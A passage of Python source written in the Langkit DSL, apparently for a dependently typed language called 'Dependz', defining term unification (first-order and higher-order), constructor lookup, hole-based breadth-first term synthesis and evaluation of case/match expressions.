q.first.unify_equation(q.second)\n )\n ))\n\n equations = Var(And(\n query_results.logic_all(lambda r: r.eq),\n\n unification_context.bind(\n ctx,\n domain_constraints.logic_all(\n lambda q: q.first.has_domain_equation(q.second)\n )\n )\n\n ))\n renamings = Var(query_results.mapcat(lambda r: r.renamings))\n\n return If(\n Try(equations.solve, allow_incomplete),\n\n symbols.map(\n lambda s: Substitution.new(\n from_symbol=s,\n to_term=vars.elem(s).get_value._.cast(Term).rename_all(\n renamings\n )\n )\n ).filter(lambda s: Not(s.to_term.is_null)),\n\n PropertyError(Substitution.array, \"Unification failed\")\n )\n\n @langkit_property(public=True, return_type=Substitution.array,\n activate_tracing=False)\n def unify_all(queries=UnifyQuery.array, symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n return Self.unify_all_with_constraints(\n queries, No(UnifyQuery.array), symbols, allow_incomplete\n )\n\n\n@synthetic\nclass LogicVarArray(DependzNode):\n @langkit_property(return_type=T.LogicVar, memoized=True)\n def elem(s=T.Symbol):\n return Self.create_named_logic_var(s)\n\n\n@abstract\nclass Term(DependzNode):\n annotations = Annotations(custom_trace_image=True)\n\n to_string = AbstractProperty(public=True, type=T.String)\n\n @langkit_property(return_type=T.Term,\n dynamic_vars=[unification_context])\n def solve_time_substitution():\n symbols = Var(unification_context.symbols)\n vars = Var(unification_context.vars)\n\n substs = Var(symbols.map(\n lambda s: Substitution.new(\n from_symbol=s,\n to_term=vars.elem(s).get_value._.cast_or_raise(Term).node\n )\n ).filter(\n lambda s: Not(s.to_term.is_null)\n ))\n\n return Self.substitute_all(substs).normalize\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context])\n def solve_time_substituted_entity():\n return Entity.solve_time_substitution.as_bare_entity\n\n @langkit_property(return_type=T.Bool,\n dynamic_vars=[unification_context],\n activate_tracing=False)\n def unifies_with(other=T.Term):\n current_self = Var(Self.solve_time_substitution.normalize)\n current_other = Var(other.solve_time_substitution.normalize)\n return Try(\n Let(\n lambda substs=current_self.unify(\n current_other,\n unification_context.symbols,\n allow_incomplete=True\n ): True\n ),\n False\n )\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context, extraction_context],\n activate_tracing=False)\n def extract_value():\n first_term = Var(\n extraction_context.first_context.solve_time_substitution.normalize\n )\n second_term = Var(extraction_context.second_context.normalize)\n\n original = Var(\n unification_context.vars.elem(\n extraction_context.target\n ).get_value._.cast_or_raise(Term)\n )\n\n return If(\n Not(original.is_null),\n original,\n Try(\n Let(\n lambda substs=first_term.unify(\n second_term,\n unification_context.symbols,\n allow_incomplete=True\n ): substs.find(\n lambda s: s.from_symbol == extraction_context.target\n ).then(\n lambda s: s.to_term.normalize.as_entity,\n default_val=No(Term.entity)\n )\n ),\n No(Term.entity)\n )\n )\n\n @langkit_property(return_type=T.Equation,\n dynamic_vars=[unification_context])\n def extract_equation(other=T.Term, source=T.Symbol, target=T.Symbol):\n return extraction_context.bind(\n ExtractionContext.new(\n target=target,\n first_context=Self,\n second_context=other\n ),\n Bind(\n unification_context.vars.elem(source),\n unification_context.vars.elem(target),\n conv_prop=Term.extract_value,\n eq_prop=Term.equivalent_entities\n )\n )\n\n 
@langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_match_match_equation(other=T.Term):\n return Self.first_order_rigid_rigid_equation(other)\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_match_equation(other=T.Term):\n tmp = Var(unification_context.vars.elem(\n Self.unique_fresh_symbol(\"tmp\")\n ))\n return UnifyEquation.new(\n eq=And(\n Bind(tmp, Self.as_bare_entity,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities),\n Bind(tmp, other.as_bare_entity,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities)\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_flexible_flexible_equation(other=T.Term):\n vars = Var(unification_context.vars)\n self_var = Var(vars.elem(Self.cast(Identifier).sym))\n other_var = Var(vars.elem(other.cast(Identifier).sym))\n\n return UnifyEquation.new(\n eq=If(\n Self.cast(Identifier).sym == other.cast(Identifier).sym,\n LogicTrue(),\n Bind(self_var, other_var)\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_flexible_semirigid_equation(other=T.Term):\n self_sym = Var(Self.cast(Identifier).sym)\n self_var = Var(unification_context.vars.elem(self_sym))\n tmp = Var(unification_context.vars.elem(\n Self.unique_fresh_symbol(\"tmp\")\n ))\n\n return UnifyEquation.new(\n eq=Or(\n And(\n Bind(tmp, other.as_bare_entity),\n Bind(tmp, self_var,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities)\n ),\n And(\n Predicate(Term.unifies_with, self_var, other),\n other.free_symbols.filter(\n lambda s: unification_context.symbols.contains(s)\n ).logic_all(\n lambda s: Self.extract_equation(other, self_sym, s)\n )\n )\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_flexible_rigid_equation(other=T.Term):\n self_var = Var(\n unification_context.vars.elem(Self.cast(Identifier).sym)\n )\n\n return UnifyEquation.new(\n eq=Bind(\n self_var,\n other.as_bare_entity,\n conv_prop=Term.solve_time_substituted_entity,\n eq_prop=Term.equivalent_entities\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context],\n activate_tracing=False)\n def first_order_rigid_rigid_equation(other=T.Term):\n\n def to_logic(bool):\n return If(bool, LogicTrue(), LogicFalse())\n\n def combine(x, y, *others):\n assert (len(others) % 2 == 0)\n\n if len(others) == 0:\n return x.unify_equation(y)\n else:\n return Let(\n lambda\n e1=x.unify_equation(y),\n e2=combine(*others):\n\n UnifyEquation.new(\n eq=And(e1.eq, e2.eq),\n renamings=e1.renamings.concat(e2.renamings)\n )\n )\n\n def unify_case(expected_type, then):\n return other.cast(expected_type).then(\n then,\n default_val=UnifyEquation.new(\n eq=LogicFalse(),\n renamings=No(Renaming.array)\n )\n )\n\n def is_metavar(term):\n return term.cast(Identifier).then(\n lambda id: unification_context.symbols.contains(id.sym)\n )\n\n updated_ctx = Var(UnificationContext.new(\n vars=unification_context.vars,\n symbols=unification_context.symbols,\n self_parent=Self,\n other_parent=other\n 
))\n return unification_context.bind(updated_ctx, Self.match(\n lambda id=Identifier: unify_case(\n Identifier,\n lambda oid: UnifyEquation.new(\n eq=to_logic(id.sym == oid.sym),\n renamings=No(Renaming.array)\n )\n ),\n\n lambda ab=Abstraction: unify_case(\n Abstraction,\n lambda o: Let(\n lambda sym=ab.term.free_fresh_symbol(\"eq\", o.term): Let(\n lambda\n rab=ab.term.rename(ab.ident.sym, sym),\n rob=o.term.rename(o.ident.sym, sym):\n\n Let(\n lambda r=rab.unify_equation(rob):\n UnifyEquation.new(\n eq=r.eq,\n renamings=r.renamings.concat(Renaming.new(\n from_symbol=sym,\n to_symbol=ab.ident.sym\n ).singleton)\n )\n )\n )\n )\n ),\n\n lambda ap=Apply: unify_case(\n Apply,\n lambda oap: combine(\n ap.lhs, oap.lhs,\n ap.rhs, oap.rhs\n )\n ),\n\n lambda ar=Arrow: unify_case(\n Arrow,\n lambda oar: Cond(\n And(ar.binder.is_null, oar.binder.is_null),\n combine(ar.lhs, oar.lhs, ar.rhs, oar.rhs),\n\n Or(ar.binder.is_null & Not(oar.has_constraining_binder),\n oar.binder.is_null & Not(ar.has_constraining_binder)),\n Let(\n lambda\n res=combine(ar.lhs, oar.lhs, ar.rhs, oar.rhs),\n unused=Self.make_ident(\n Self.free_fresh_symbol(\"unused\")\n ):\n\n UnifyEquation.new(\n eq=And(\n res.eq,\n Cond(\n ar.binder.is_null & is_metavar(oar.binder),\n Bind(\n unification_context.vars.elem(\n oar.binder.cast(Identifier).sym\n ),\n unused.as_bare_entity\n ),\n\n oar.binder.is_null & is_metavar(ar.binder),\n Bind(\n unification_context.vars.elem(\n ar.binder.cast(Identifier).sym\n ),\n unused.as_bare_entity\n ),\n\n LogicTrue()\n )\n ),\n renamings=res.renamings\n )\n ),\n\n Or(ar.binder.is_null, oar.binder.is_null),\n UnifyEquation.new(\n eq=LogicTrue(),\n renamings=No(Renaming.array)\n ),\n\n combine(\n ar.binder, oar.binder,\n ar.lhs, oar.lhs,\n ar.rhs, oar.rhs\n )\n )\n )\n ))\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def first_order_unify_equation(other=T.Term):\n symbols = Var(unification_context.symbols)\n\n def is_match(term):\n return And(\n term.is_match_application,\n term.cast(Apply).rhs.cast(Identifier).then(\n lambda id: symbols.contains(id.sym)\n )\n )\n\n self_is_match = Var(is_match(Self))\n other_is_match = Var(is_match(other))\n\n self_is_metavar = Var(Self.cast(Identifier).then(\n lambda id: symbols.contains(id.sym)\n ))\n other_is_metavar = Var(other.cast(Identifier).then(\n lambda id: symbols.contains(id.sym)\n ))\n\n self_has_metavar = Var(symbols.any(lambda s: Self.is_free(s)))\n other_has_metavar = Var(symbols.any(lambda s: other.is_free(s)))\n\n return Cond(\n self_is_match & other_is_match,\n Self.first_order_match_match_equation(other),\n\n self_is_match,\n Self.first_order_match_equation(other),\n\n other_is_match,\n other.first_order_match_equation(Self),\n\n self_is_metavar & other_is_metavar,\n Self.first_order_flexible_flexible_equation(other),\n\n self_is_metavar & other_has_metavar,\n Self.first_order_flexible_semirigid_equation(other),\n\n other_is_metavar & self_has_metavar,\n other.first_order_flexible_semirigid_equation(Self),\n\n self_is_metavar,\n Self.first_order_flexible_rigid_equation(other),\n\n other_is_metavar,\n other.first_order_flexible_rigid_equation(Self),\n\n Self.first_order_rigid_rigid_equation(other)\n )\n\n @langkit_property(return_type=T.Bool,\n dynamic_vars=[unification_context,\n ho_unification_context],\n activate_tracing=False)\n def higher_order_check_current_solution():\n return Entity.make_apply(\n Self,\n ho_unification_context.arg\n ).unifies_with(\n 
ho_unification_context.res\n )\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context,\n ho_unification_context])\n def higher_order_construct_imitation():\n res = Var(ho_unification_context.res)\n body = Var(res.solve_time_substitution)\n fresh_sym = Var(body.free_fresh_symbol(\"ho\"))\n\n return Entity.make_abstraction(\n Self.make_ident(fresh_sym),\n body\n ).as_bare_entity\n\n @langkit_property(return_type=T.Term.entity,\n dynamic_vars=[unification_context,\n ho_unification_context])\n def higher_order_construct_projection():\n arg = Var(ho_unification_context.arg)\n res = Var(ho_unification_context.res)\n fresh_sym = Var(res.free_fresh_symbol(\"ho\"))\n\n return Entity.make_abstraction(\n Self.make_ident(fresh_sym),\n res.solve_time_substitution.anti_substitute(\n arg.solve_time_substitution,\n fresh_sym\n )\n ).as_bare_entity\n\n @langkit_property(return_type=T.UnifyEquation,\n activate_tracing=False,\n dynamic_vars=[unification_context])\n def higher_order_single_arg_equation(arg=T.Term, res=T.Term,\n ho_sym=T.Symbol):\n metavar = Var(unification_context.vars.elem(ho_sym))\n\n ho_ctx = Var(HigherOrderUnificationContext.new(\n arg=arg,\n res=res\n ))\n\n imitate = Var(ho_unification_context.bind(\n ho_ctx,\n Bind(\n metavar,\n Self.as_bare_entity,\n eq_prop=Term.equivalent_entities,\n conv_prop=Term.higher_order_construct_imitation\n )\n ))\n\n project = Var(ho_unification_context.bind(\n ho_ctx,\n Bind(\n metavar,\n Self.as_bare_entity,\n eq_prop=Term.equivalent_entities,\n conv_prop=Term.higher_order_construct_projection\n )\n ))\n\n ignore = Var(ho_unification_context.bind(\n ho_ctx,\n And(\n Predicate(\n Term.higher_order_check_current_solution,\n metavar\n ),\n res.free_symbols.filter(\n lambda s: unification_context.symbols.contains(s)\n ).logic_all(\n lambda s: Self.extract_equation(res, ho_sym, s)\n )\n )\n ))\n\n return UnifyEquation.new(\n eq=Or(\n project,\n ignore,\n imitate,\n ),\n renamings=No(Renaming.array)\n )\n\n @langkit_property(return_type=T.UnifyEquation,\n dynamic_vars=[unification_context])\n def higher_order_unify_equation(other=T.Term, ho_term=T.Identifier):\n is_single_arg_equation = Var(And(\n Self.cast(Apply).lhs == ho_term,\n other.is_a(Term)\n ))\n return Cond(\n is_single_arg_equation,\n Self.higher_order_single_arg_equation(\n Self.cast(Apply).rhs,\n other,\n ho_term.sym\n ),\n\n UnifyEquation.new(\n eq=LogicTrue(),\n renamings=No(Renaming.array)\n )\n )\n\n @langkit_property(return_type=UnifyEquation, uses_entity_info=False,\n dynamic_vars=[unification_context])\n def unify_equation(other=T.Term):\n symbols = Var(unification_context.symbols)\n\n def outermost_metavar_application_of(term, parent_term):\n return term.cast(Apply)._.left_most_term.cast(Identifier).then(\n lambda id: If(\n # Check the id is indeed a metavariable, and that it's the\n # first time we discover this higher order application.\n # (if it's not, it means term.parent must not be an Apply).\n And(symbols.contains(id.sym),\n Not(parent_term.cast(Apply)._.lhs == term)),\n id,\n No(Identifier)\n )\n )\n\n self_hoa = Var(outermost_metavar_application_of(\n Self, unification_context.self_parent\n ))\n other_hoa = Var(outermost_metavar_application_of(\n other, unification_context.other_parent\n ))\n\n unify_eqs = Var(\n Self.first_order_unify_equation(other).singleton\n .concat(self_hoa.then(\n lambda id:\n Self.higher_order_unify_equation(other, id).singleton\n )).concat(other_hoa.then(\n lambda id:\n other.higher_order_unify_equation(Self, id).singleton\n 
))\n )\n\n return UnifyEquation.new(\n eq=unify_eqs.logic_any(lambda eq: eq.eq),\n renamings=unify_eqs.mapcat(lambda eq: eq.renamings)\n )\n\n @langkit_property(return_type=Substitution.array)\n def unify_with_constraints(other=T.Term,\n domain_constraints=UnifyQuery.array,\n symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n return Self.unify_all_with_constraints(\n UnifyQuery.new(first=Self, second=other).singleton,\n domain_constraints,\n symbols,\n allow_incomplete\n )\n\n @langkit_property(public=True, return_type=Substitution.array)\n def unify(other=T.Term, symbols=T.Symbol.array,\n allow_incomplete=(T.Bool, False)):\n return Self.unify_all(\n UnifyQuery.new(first=Self, second=other).singleton,\n symbols,\n allow_incomplete\n )\n\n @langkit_property(return_type=T.Term, memoized=True)\n def final_result_domain():\n return Self.normalize.match(\n lambda ar=Arrow: ar.rhs.final_result_domain,\n lambda x: x\n )\n\n @langkit_property(return_type=T.Int, memoized=True)\n def param_count():\n return Self.normalize.match(\n lambda ar=Arrow: ar.rhs.param_count + 1,\n lambda _: 0\n )\n\n @langkit_property(return_type=T.Term.array)\n def call_args():\n return Self.match(\n lambda ap=Apply: ap.lhs.call_args.concat(ap.rhs.singleton),\n lambda _: No(Term.array)\n )\n\n @langkit_property(return_type=T.Bool, public=True)\n def is_call_to(sym=T.Symbol, left_args=T.Int):\n return Self.match(\n lambda i=Identifier: (i.sym == sym) & (left_args == 0),\n lambda ap=Apply: ap.lhs.is_call_to(sym, left_args - 1),\n lambda _: False\n )\n\n @langkit_property(return_type=T.Term.array)\n def find_calls_to(sym=T.Symbol, args=T.Int):\n return Self.match(\n lambda ap=Apply: ap.lhs.find_calls_to(sym, args).concat(\n ap.rhs.find_calls_to(sym, args)\n ),\n lambda ar=Arrow: ar.lhs.find_calls_to(sym, args).concat(\n ar.rhs.find_calls_to(sym, args)\n ).concat(ar.binder._.find_calls_to(sym, args)),\n lambda ab=Abstraction: ab.term.find_calls_to(sym, args),\n lambda _: No(Term.array)\n ).concat(Self.is_call_to(sym, args).then(\n lambda _: Self.singleton\n ))\n\n @langkit_property(return_type=T.Constructor.array)\n def constructors_impl(constructors=T.Introduction.array,\n generics=T.Symbol.array,\n domain_constraints=(UnifyQuery.array,\n No(UnifyQuery.array))):\n return constructors.map(\n lambda c: c.as_template(c.ident)\n ).mapcat(\n lambda c: Let(\n lambda inst=c.instance.final_result_domain:\n\n Try(\n Let(\n lambda substs=Self.unify_with_constraints(\n inst,\n domain_constraints,\n c.new_symbols.concat(generics),\n allow_incomplete=True\n ):\n\n Constructor.new(\n template=Template.new(\n origin=c.origin,\n instance=c.instance.substitute_all(substs),\n new_symbols=c.new_symbols.filter(\n lambda sym: Not(substs.any(\n lambda subst: subst.from_symbol == sym\n ))\n )\n ),\n substs=substs\n ).singleton\n ),\n No(Constructor.array)\n )\n )\n )\n\n @langkit_property(return_type=T.Constructor.array.array)\n def grouped_constructors_impl(constrs=T.Constructor.array, i=T.Int):\n filtered = Var(constrs.filter(\n lambda c:\n (c.template.instance.param_count +\n c.template.new_symbols.length) == i\n ))\n not_filtered = Var(constrs.filter(\n lambda c:\n (c.template.instance.param_count +\n c.template.new_symbols.length) != i\n ))\n return filtered.singleton.concat(\n not_filtered.then(\n lambda rest: Self.grouped_constructors_impl(rest, i + 1)\n )\n )\n\n @langkit_property(return_type=T.Constructor.array.array)\n def grouped_constructors(constructors=T.Introduction.array,\n generics=T.Symbol.array,\n 
domain_constraints=UnifyQuery.array):\n return Self.grouped_constructors_impl(\n Self.constructors_impl(constructors, generics, domain_constraints),\n 0\n )\n\n @langkit_property(public=True, return_type=T.Term.entity.array)\n def constructors():\n normed = Var(Self.normalize)\n generics = Var(normed.free_symbols)\n\n ignore(Var(Cond(\n normed.is_a(Arrow),\n PropertyError(T.Bool, \"Cannot list constructors of arrow types\"),\n\n normed.is_a(Abstraction),\n PropertyError(T.Bool, \"Abstractions are not valid domains\"),\n\n True\n )))\n\n intros = Var(Self.unit.root.cast(Program).all_constructors)\n\n return normed.constructors_impl(intros, generics).map(\n lambda c: c.template.origin.as_bare_entity\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_abstraction():\n ar = Var(Self.cast_or_raise(Arrow))\n\n sym = Var(Self.unique_fresh_symbol(ar.binder._.cast(Identifier).then(\n lambda id: id.sym,\n default_val=\"x\"\n )))\n id = Var(Self.make_ident(sym))\n\n body_attempt = Var(ar.binder.then(\n lambda b: b.cast(Identifier).then(\n lambda i: i.intro.then(\n lambda _: ar.rhs,\n default_val=ar.rhs.substitute(i.sym, id)\n ),\n default_val=PropertyError(\n Term, \"Non-identifier binders are not handled yet.\"\n )\n ),\n default_val=ar.rhs\n ).then(\n lambda rhs: synthesis_context.bind(\n SynthesisContext.new(\n intros=synthesis_context.intros.concat(\n Self.make_nested_intro(\n name=id, dom=ar.lhs,\n bound_generics=synthesis_context.bound_generics\n ).cast(Introduction).singleton\n ),\n bound_generics=synthesis_context.bound_generics\n ),\n rhs.synthesize_impl\n )\n ))\n\n return SynthesizationAttempt.new(\n term=Self.make_abstraction(id, body_attempt.term),\n holes=body_attempt.holes,\n free_symbols=body_attempt.free_symbols\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_apply_arrow(built=T.Term, ar=T.Arrow):\n binder = Var(ar.binder)\n\n is_introduced = Var(binder.then(\n lambda b: b.free_symbols.all(\n lambda s: synthesis_context.intros.any(\n lambda i: i.ident.sym == s\n )\n )\n ))\n\n arg = Var(If(\n is_introduced,\n SynthesizationAttempt.new(\n term=binder,\n holes=No(SynthesizationHole.array),\n free_symbols=No(T.Symbol.array)\n ),\n synthesis_context.bind(\n SynthesisContext.new(\n intros=synthesis_context.intros,\n bound_generics=synthesis_context.bound_generics.concat(\n ar.lhs.free_symbols.filter(\n lambda s:\n Not(synthesis_context.bound_generics.contains(s))\n )\n )\n ),\n ar.lhs.synthesize_impl\n )\n ))\n\n new_built = Var(Self.make_apply(built, arg.term))\n\n rhs_type = Var(If(\n binder.is_null | is_introduced,\n ar.rhs,\n ar.rhs.substitute(\n binder.cast(Identifier).then(\n lambda b: b.sym,\n default_val=PropertyError(\n Symbol, \"Non-identifier binders are not handled yet.\"\n )\n ),\n arg.term\n )\n ))\n\n rec = Var(Self.synthesize_apply(new_built, rhs_type))\n\n return SynthesizationAttempt.new(\n term=rec.term,\n holes=rec.holes.concat(arg.holes),\n free_symbols=rec.free_symbols\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_apply(built=T.Term, callee_type=T.Term):\n return callee_type.match(\n lambda ar=Arrow:\n Self.synthesize_apply_arrow(built, ar),\n\n lambda _: SynthesizationAttempt.new(\n term=built,\n holes=No(SynthesizationHole.array),\n free_symbols=No(T.Symbol.array)\n )\n )\n\n @langkit_property(return_type=Constructor.array,\n dynamic_vars=[synthesis_context],\n 
activate_tracing=True)\n def synthesizable_constructors(generics=T.Symbol.array,\n domain_constraints=UnifyQuery.array):\n intros = Var(\n Self.unit.root.cast(Program).all_constructors\n .concat(synthesis_context.intros)\n )\n\n return Self.grouped_constructors(\n intros, generics, domain_constraints\n ).mapcat(\n lambda constrs: constrs\n )\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context])\n def synthesize_impl():\n return Self.normalize.match(\n lambda ar=Arrow: ar.synthesize_abstraction,\n lambda ab=Abstraction: PropertyError(\n SynthesizationAttempt, \"Abstractions are not valid domains\"\n ),\n lambda other: Let(\n lambda hole=Self.make_ident(Self.unique_fresh_symbol(\"hole\")):\n\n SynthesizationAttempt.new(\n term=hole,\n holes=SynthesizationHole.new(\n sym=hole.sym,\n domain_val=other,\n ctx=synthesis_context\n ).singleton,\n free_symbols=No(T.Symbol.array)\n )\n )\n )\n\n @langkit_property(return_type=SynthesizationHole.array)\n def updated_hole_set(original_holes=SynthesizationHole.array,\n substs=T.Substitution.array,\n potential_emerging_holes=T.Identifier.array,\n index=(T.Int, 0)):\n h = Var(original_holes.at(index))\n\n subst = Var(substs.find(lambda s: s.from_symbol == h.sym))\n is_replaced = Var(Not(subst.is_null))\n\n emerging_holes = Var(If(\n is_replaced,\n potential_emerging_holes.filter(\n lambda id: subst.to_term.is_free(id.sym)\n ),\n No(T.Identifier.array),\n ))\n\n rest_potential_emerging_holes = Var(potential_emerging_holes.filter(\n lambda h: Not(emerging_holes.contains(h))\n ))\n\n updated_ctx = Var(SynthesisContext.new(\n intros=h.ctx.intros.map(\n lambda i: Self.make_nested_intro(\n name=i.ident,\n dom=i.term.substitute_all(substs),\n bound_generics=h.ctx.bound_generics\n ).cast(Introduction)\n ),\n bound_generics=h.ctx.bound_generics\n ))\n\n return Cond(\n Not(is_replaced),\n\n SynthesizationHole.new(\n sym=h.sym,\n domain_val=h.domain_val.substitute_all(substs),\n ctx=updated_ctx\n ).singleton,\n\n emerging_holes.length > 0,\n emerging_holes.map(\n lambda id: SynthesizationHole.new(\n sym=id.sym,\n domain_val=id.domain_val,\n ctx=updated_ctx\n )\n ),\n\n No(SynthesizationHole.array)\n ).concat(If(\n index == original_holes.length - 1,\n No(SynthesizationHole.array),\n Self.updated_hole_set(\n original_holes,\n substs,\n rest_potential_emerging_holes,\n index + 1\n )\n ))\n\n @langkit_property(return_type=SynthesizationAttempt,\n dynamic_vars=[synthesis_context],\n activate_tracing=True)\n def construct_attempt(from_attempt=SynthesizationAttempt,\n from_hole=SynthesizationHole, constr=Constructor):\n\n dom = Var(from_hole.domain_val)\n\n atp = Var(dom.synthesize_apply(\n constr.template.origin,\n constr.template.instance\n ))\n\n substs = Var(Substitution.new(\n from_symbol=from_hole.sym,\n to_term=atp.term\n ).singleton.concat(constr.substs))\n\n updated_holes = Var(Self.updated_hole_set(\n atp.holes.concat(from_attempt.holes),\n substs,\n constr.template.new_symbols.mapcat(\n lambda s: Self.make_ident(s).then(\n lambda id: If(\n Not(id.domain_val.is_null),\n id.cast(Identifier).singleton,\n No(Identifier.array)\n )\n )\n )\n ))\n\n return SynthesizationAttempt.new(\n term=from_attempt.term.substitute_all(substs, unsafe=True),\n holes=updated_holes,\n free_symbols=from_attempt.free_symbols.filter(\n lambda sym: Not(substs.any(lambda s: s.from_symbol == sym))\n ).concat(\n constr.template.new_symbols.filter(\n lambda s: Not(updated_holes.any(lambda h: h.sym == s))\n )\n )\n )\n\n 
@langkit_property(return_type=SynthesizationAttempt.array,\n activate_tracing=True)\n def synthesize_attempt(attempt=SynthesizationAttempt,\n origin=T.Introduction):\n first_hole = Var(attempt.holes.at(0))\n free_syms = Var(\n attempt.holes.map(lambda h: h.sym).concat(attempt.free_symbols)\n )\n\n hole_constraints = Var(\n attempt.holes.filter(\n lambda h: first_hole.domain_val.is_free(h.sym)\n ).map(\n lambda h: UnifyQuery.new(\n first=Self.make_ident(h.sym),\n second=h.domain_val\n )\n )\n )\n\n constrs = Var(synthesis_context.bind(\n first_hole.ctx,\n first_hole.domain_val.synthesizable_constructors(\n free_syms,\n hole_constraints\n )\n ))\n\n return synthesis_context.bind(first_hole.ctx, constrs.mapcat(\n lambda constr: Try(\n Self.construct_attempt(attempt, first_hole, constr).singleton,\n No(SynthesizationAttempt.array)\n )\n ))\n\n @langkit_property(return_type=T.Term)\n def synthesize_breadth_first_search(attempts=SynthesizationAttempt.array,\n origin=T.Introduction, depth=T.Int):\n result = Var(attempts.find(lambda atp: atp.holes.length == 0))\n return Cond(\n Not(result.is_null),\n result.term,\n\n depth == 0,\n attempts.at(0).term,\n\n Self.synthesize_breadth_first_search(\n attempts.mapcat(\n lambda atp: Self.synthesize_attempt(atp, origin)\n ),\n origin,\n depth - 1\n )\n )\n\n @langkit_property(return_type=T.Term)\n def sanitize_synthesization(from_term=T.Term):\n arrow_type = Var(from_term.cast(Arrow))\n binder = Var(arrow_type._.binder.cast(Identifier))\n abs = Var(Self.cast(Abstraction))\n return If(\n Not(abs.is_null) & Not(binder.is_null),\n Self.make_abstraction(\n binder,\n abs.term.substitute(\n abs.ident.sym, binder\n ).sanitize_synthesization(arrow_type.rhs)\n ),\n Self\n )\n\n @langkit_property(public=True, return_type=T.Term)\n def synthesize(origin=(T.Introduction, No(T.Introduction))):\n return synthesis_context.bind(\n SynthesisContext.new(\n intros=No(Introduction.array),\n bound_generics=Self.free_symbols\n ),\n Self.synthesize_breadth_first_search(\n Self.synthesize_impl.singleton,\n origin,\n 10\n )\n )._.sanitize_synthesization(Self)\n\n @langkit_property(public=True, return_type=T.Symbol.array, memoized=True)\n def free_symbols(deep=(T.Bool, False)):\n return Self.free_symbols_impl(deep, 0)\n\n @langkit_property(public=True, return_type=T.Symbol.array)\n def free_symbols_impl(deep=T.Bool, cur_depth=T.Int):\n def combine(l, r):\n return l.concat(r.filter(\n lambda s: Not(l.contains(s))\n ))\n\n def rec(node, inc_depth, then):\n return Let(\n lambda l=node.free_symbols_impl(\n deep, (cur_depth + 1) if inc_depth else cur_depth\n ): then(l)\n )\n\n return Self.match(\n lambda id=Identifier: id.intro.then(\n lambda _: No(T.Symbol.array),\n default_val=id.sym.singleton\n ),\n\n lambda ab=Abstraction:\n ab.term.free_symbols_impl(deep, cur_depth).filter(\n lambda s: s != ab.ident.sym\n ),\n\n lambda ap=Apply: rec(\n ap.lhs, False,\n lambda l: rec(\n ap.rhs, False,\n lambda r: combine(l, r)\n )\n ),\n\n lambda ar=Arrow: If(\n And(Not(deep), cur_depth > 0),\n No(T.Symbol.array),\n rec(\n ar.lhs, True,\n lambda l: rec(\n ar.rhs, False,\n lambda r: ar.binder.then(\n lambda b: rec(\n b, False,\n lambda x: combine(x, combine(l, r))\n ),\n default_val=combine(l, r)\n )\n )\n )\n )\n )\n\n @langkit_property(return_type=T.Bool, public=True)\n def is_free(sym=T.Symbol):\n return Self.match(\n lambda id=Identifier:\n id.sym == sym,\n\n lambda ap=Apply:\n ap.lhs.is_free(sym) | ap.rhs.is_free(sym),\n\n lambda ab=Abstraction:\n (ab.ident.sym != sym) & 
ab.term.is_free(sym),\n\n lambda ar=Arrow:\n ar.lhs.is_free(sym)\n | ar.rhs.is_free(sym)\n | ar.binder._.is_free(sym)\n )\n\n @langkit_property(return_type=T.Symbol)\n def free_fresh_symbol(prefix=T.Symbol, other=(T.Term, No(T.Term)),\n i=(T.Int, 0)):\n sym = Var(Self.concat_symbol_and_integer(prefix, i))\n return If(\n And(Self.is_free(sym), Or(other.is_null, other.is_free(sym))),\n Self.free_fresh_symbol(prefix, other, i + 1),\n sym\n )\n\n @langkit_property(return_type=T.Term)\n def eval_case(matches=T.Term, then_case=T.Term, else_case=T.Term):\n constr = Var(matches.cast_or_raise(Identifier))\n return Cond(\n Self.cast(Identifier)._.sym == constr.sym,\n then_case.eval,\n\n Self.cast(Apply)._.left_most_term.cast(Identifier)\n ._.sym == constr.sym,\n Self.cast(Apply).replace_left_most_term_with(then_case).eval,\n\n else_case._.extract_case_and_eval(Self)\n\n # todo: handle arrows here?\n )\n\n @langkit_property(return_type=T.Term)\n def extract_case_and_eval(arg=T.Term):\n case_expr = Var(Self.cast_or_raise(Apply))\n case_id = Var(case_expr.left_most_term.cast(Identifier))\n case_lhs = Var(case_expr.lhs.cast_or_raise(Apply))\n has_else = Var(case_lhs.lhs != case_id)\n return If(\n case_id._.sym == \"case\",\n If(\n has_else,\n arg.eval_case(\n case_lhs.lhs.cast_or_raise(Apply).rhs,\n case_lhs.rhs,\n case_expr.rhs\n ),\n arg.eval_case(\n case_lhs.rhs,\n case_expr.rhs,\n No(T.Term)\n )\n ),\n PropertyError(T.Term, \"expected `case`\")\n )\n\n @langkit_property(return_type=T.Bool, memoized=True)\n def is_match_application():\n elim_call = Var(Self.cast(Apply))\n elim_evaled = Var(elim_call._.lhs.eval.cast(Apply))\n elim_id = Var(elim_evaled._.lhs)\n return elim_id.cast(Identifier)._.sym == \"match\"\n\n @langkit_property(return_type=T.Term, memoized=True)\n def eval_match():\n elim_call = 